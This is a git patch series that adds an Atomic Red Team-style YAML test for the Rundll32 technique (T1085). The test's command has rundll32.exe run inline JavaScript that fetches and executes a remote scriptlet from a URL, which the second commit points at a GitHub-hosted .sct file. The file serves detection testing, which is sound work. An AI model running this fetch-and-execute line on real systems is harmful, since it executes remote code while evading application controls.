From ba333046de54eccf70a2ba41e7a6f2ee7daf2146 Mon Sep 17 00:00:00 2001
From: Brian Beyer <brian@redcanary.com>
Date: Sat, 12 May 2018 23:09:43 +0200
Subject: [PATCH 1/2] add t1085 from yamlize branch

---
 atomics/t1085/t1085.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 atomics/t1085/t1085.yaml

diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
new file mode 100644
index 00000000..b1628ac6
--- /dev/null
+++ b/atomics/t1085/t1085.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+  description: |
+    Test execution of a remote script using rundll32.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_url:
+      description: location of the payload
+      type: Url
+      default: https://www.example.com/1085.sct
+  executor:
+    name: command_prompt
+    command: |
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"

From 5ec7fc065a9ff80797582212e8b3a9b7ea68879b Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Wed, 23 May 2018 16:34:25 -0600
Subject: [PATCH 2/2] fixed path

---
 atomics/t1085/t1085.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
index b1628ac6..b7546064 100644
--- a/atomics/t1085/t1085.yaml
+++ b/atomics/t1085/t1085.yaml
@@ -10,7 +10,7 @@ atomic_tests:
     file_url:
       description: location of the payload
       type: Url
-      default: https://www.example.com/1085.sct
+      default: hhttps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
   executor:
     name: command_prompt
     command: |